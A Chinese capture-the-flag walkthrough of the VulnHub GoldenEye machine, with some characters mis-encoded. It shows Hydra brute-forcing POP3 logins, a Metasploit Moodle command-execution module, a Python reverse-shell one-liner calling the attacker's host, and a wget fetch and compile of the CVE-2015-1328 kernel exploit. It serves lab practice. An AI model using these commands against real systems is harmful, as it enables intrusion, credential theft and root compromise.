信息收集

1、首先打開kali查看ip段，這里著重強調(diào)，靶場的網(wǎng)卡要和我本kali的網(wǎng)卡一致。

發(fā)現(xiàn)是192.168.159.149，這樣這樣我們通過nmap來掃描C端

nmap -sV 192.168.159.0/24

192.168.159.1是我本機ip，直接排除，192.168.159.2是我的網(wǎng)關(guān)，直接排除，192.168.159.131是我的kali直接排除，確定靶機是192.168.159.154

2、直接對192.168.159.154進行深度挖掘

nmap -sS -sV -T5 -A 192.168.159.154

這里可以看到，靶場開發(fā)了25端口，80端口，我們打開瀏覽器訪問一下80端口

一串英文，看不懂，直接上谷歌翻譯

其他的都不重要，主要看一下紅框里面的，一個路徑，我們直接拼接到后面，進行訪問

可以看到，這里需要賬號和密碼

這里我們查看一下網(wǎng)頁的源代碼

發(fā)現(xiàn)這里有一個js文件，那就點看查看它，又是英文，直接翻譯

通過信息收集發(fā)現(xiàn)，這里出現(xiàn)了兩個人名字一個Boris，一個Natalya，還有一串加密的密碼，

InvincibleHack3r

這時候，我們把它放在Bupr來HTML破解，得到密碼：InvincibleHack3r

接下來，我們就可以嘗試登陸，最終賬號密碼：boris/InvincibleHack3r，登陸成功后

上翻譯，看看到底什么意思

那我們就訪問一下http://192.168.159.154/sev-home/

發(fā)現(xiàn)新大陸，看一下網(wǎng)頁上的英文是什么意思

這里寫道pop3，在一個非常高的默認(rèn)端口上，Qualified GoldenEye Network Operator Supervisors: 合格的 GoldenEye 網(wǎng)絡(luò)運營商主管，這里我就想到了Natalya和Boris。

這里我們就要用nmap對靶機進行全端口掃描，看看什么情況

namp -p- 192.168.159.154

果然出現(xiàn)了兩個比較高的端口，那是不是pop3端口那？用nmap繼續(xù)進行測試

nmap -sS -sV -T5 -A -p55006,55007 192.168.159.154

這里指定端口進行掃描

這里，我也不知道它到底在那個端口上，那么就挨個嘗試,這里55006，直接顯示錯誤了，那就是55007

訪問http://192.168.159.154:55007

這段信息看出這兩個端口開放了pop3的mail服務(wù)的，通過頁面http://192.168.159.154/terminal.js，

在注釋中發(fā)現(xiàn)一條內(nèi)容，指出目標(biāo)系統(tǒng)正在使用默認(rèn)密碼。//Boris, make sure you update your default password.

接下來嘗試使用暴力破解，在上一步中找到的用戶名“boris”，通過Hydra暴力破解pop3服務(wù)；

echo -e 'natalya\nboris' > wangkun.txt --將這兩個人名字寫到wangkun.txt中

hydra -L wangkun.txt -P /usr/share/wordlists/fasttrack.txt 192.168.159.154 -s 55007 pop3 --用九頭蛇對pop3進行爆破

經(jīng)過漫長的等待，他居然成功了

natalya/bird

boris/secret1!

接下來用通過NC登錄pop3查看郵件信封內(nèi)容枚舉：

nc 192.168.159.154 55007 ---登錄郵箱

user boris ---登錄用戶

pass secret1! ---登錄密碼

list ---查看郵件數(shù)量

retr 1~3 ---查看郵件內(nèi)容

翻譯大致意思

翻譯大致意思

接下來我們看natalya的郵件

翻譯大致意思

翻譯大致意思

在第二封郵件看到了另外一個用戶名密碼，此服務(wù)器域名和網(wǎng)站，還要求我們在本地服務(wù)hosts中添加域名信息：

用戶名：xenia

密碼：RCP90rulez!

域：severnaya-station.com

網(wǎng)址：severnaya-station.com/gnocertdir

我們現(xiàn)根據(jù)郵件提示添加本地域名：severnaya-station.com

設(shè)置本地HOSTS文件

gedit /etc/hosts

192.168.159.154 severnaya-station.com

直接訪問：severnaya-station.com/gnocertdir地址：

剛登陸界面我就看到了moodle，這是一個開源的CMS系統(tǒng)，繼續(xù)點一點，發(fā)現(xiàn)要登陸，使用郵件獲得的用戶密碼進行登陸。用郵件里面的用戶名和密碼進行登陸一下

登陸成功

在Home->My profile->Messages下面發(fā)現(xiàn)一封郵件

發(fā)現(xiàn)了新的用戶doak

接著之前的步驟，用九頭蛇對doak用戶進行pop3爆破

將doak寫入wangkun.txt進行爆破

echo ‘doak’ > wangkun.txt

hydra -L wangkun.txt -P /usr/share/wordlists/fasttrack.txt 192.168.159.154 -s 55007 pop3

成功爆破賬號密碼：doak/goat,嘗試登陸頁面，但顯示登陸無效，請重試

那我們用nc進行登陸查看郵件

翻譯大致意思如下

它讓登陸dr_doak/4England!賬號繼續(xù)挖掘

登陸成功，繼續(xù)查看郵件，在Home->My profile ->My private file 目錄下發(fā)現(xiàn)了s3crer.txt

將文件下載下來進行查看

訪問這個目錄，而且還發(fā)現(xiàn)他的版本是2.2.3

接下來訪問目錄http://severnaya-station.com/dir007key/for-007.jpg，看看是什么

是一張圖片，將圖片下載，

binwalk（路由逆向分析工具）

exiftool（圖蟲）

strings（識別動態(tài)庫版本指令）

等查看jpg文件底層內(nèi)容！

exiftool for-007.jpg

strings for-007.jpg

用以上命令都可以查看到base64編碼隱藏信息：eFdpbnRlcjE5OTV4IQ==

放在burp里面進行解碼：xWinter1995x!

由上面可以知道，這里可能是管理員的密碼，那就在登陸嘗試一下

登陸成功，我們又知道這個CMS有漏洞，接下來就是漏洞利用

Moodle 2.2.3 exp cve --> CVE-2013-3630 漏洞可利用！ 29324

第一種方法獲得shell

這里也可以使用kali里面的MSF模塊

msfconsole ---進入MSF框架攻擊界面

search moodle ---查找 moodle類型 攻擊的模塊

use 0 ---調(diào)用0 exploit/multi/http/moodle_cmd_exec調(diào)用攻擊腳本

set username admin ---設(shè)置用戶名：admin

set password xWinter1995x! ---設(shè)置密碼：xWinter1995x!

set rhost severnaya-station.com ---設(shè)置：rhosts severnaya-station.com

set targeturi /gnocertdir ---設(shè)置目錄： /gnocertdir

set payload cmd/unix/reverse ---設(shè)置payload：cmd/unix/reverse

set lhost 192.168.159.131 ---設(shè)置：lhost 192.168.159.131（需要本地IP）

exploit ----執(zhí)行命令

利用失敗，當(dāng)我們執(zhí)行后發(fā)現(xiàn)無法成功，是因為對方需要修改執(zhí)行PSpellShell，Moodle - Remote Command Execution (Metasploit) - Linux remote Exploit

's_editor_tinymce_spellengine' => 'PSpellShell',

我們在國外漏洞庫搜索的時候，發(fā)現(xiàn)他要是用PSpellShell，經(jīng)過仔細尋找，然后我們在Site administration ->Advanced features -> Plugins->Text editors->TinyMCE HTML editor

來到此處，修改PSpellShell然后save！

第二種方法獲得shell

Home -> Site administration ->Server->System paths 目錄執(zhí)行python腳本

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.131",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Home->My profile->Blogs->Add a new entry 在這位置輸入 ， 執(zhí)行命令

成功獲得shell會話

由于權(quán)限過低，我們要進行提權(quán)

首先看一下內(nèi)核版本

谷歌搜索：Linux ubuntu 3.13.0-32 exploit

獲得exp版本：37292

CVE(CAN) ID: CVE-2015-1328

overlayfs文件系統(tǒng)是一種疊合式文件系統(tǒng)，實現(xiàn)了在底層文件系統(tǒng)上疊加另一個文件系統(tǒng)。Linux 內(nèi)核3.18開始已經(jīng)加入了對overlayfs的支持。Ubuntu Linux內(nèi)核在更早的版本就已加入該支持。

Ubuntu Linux內(nèi)核的overlayfs文件系統(tǒng)實現(xiàn)中存在一個權(quán)限檢查漏洞，本地普通用戶可以獲取管理員權(quán)限。此漏洞影響所有目前官方支持的Ubuntu Linux版本，目前已經(jīng)發(fā)布攻擊代碼，建議受影響用戶盡快進行升級。

此漏洞源于overlayfs文件系統(tǒng)在上層文件系統(tǒng)目錄中創(chuàng)建新文件時沒有正確檢查文件權(quán)限。它只檢查了被修改文件的屬主是否有權(quán)限在上層文件系統(tǒng)目錄寫入，導(dǎo)致當(dāng)從底層文件系統(tǒng)目錄中拷貝一個文件到上層文件系統(tǒng)目錄時，文件屬性也隨同拷貝過去。如果Linux內(nèi)核設(shè)置了CONFIG_USER_NS=y和FS_USERNS_MOUNT標(biāo)志，將允許一個普通用戶在低權(quán)限用戶命名空間中mout一個overlayfs文件系統(tǒng)。本地普通用戶可以利用該漏洞在敏感系統(tǒng)目錄中創(chuàng)建新文件或讀取敏感文件內(nèi)容，從而提升到管理員權(quán)限。

kali下面：searchsploit 37292

將腳本copy到root目錄下：

cp /usr/share/exploitdb/exploits/linux/local/37292.c /root

這個靶場在枚舉信息知道：

無法進行GCC編譯，需要改下腳本為cc

gedit 37292.c ---文本打開

第143行將gcc改為cc ---編寫下

然后在本目錄下開啟http服務(wù)：python -m SimpleHTTPServer 8081

wget http://192.168.159.131:8081/37292.c

成功下載后執(zhí)行cc編譯：

cc -o exp 37292.c ---C語言的CC代碼編譯點c文件

chmod +x exp ---編譯成可執(zhí)行文件，并賦權(quán)

./exp ---點杠執(zhí)行

id ---查看目前權(quán)限

cat /root/.flag.txt ---讀取root下的flag信息

至此整個靶場結(jié)束

總結(jié)

以上是生活随笔為你收集整理的[vuluhub]-(GoldenEye)的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。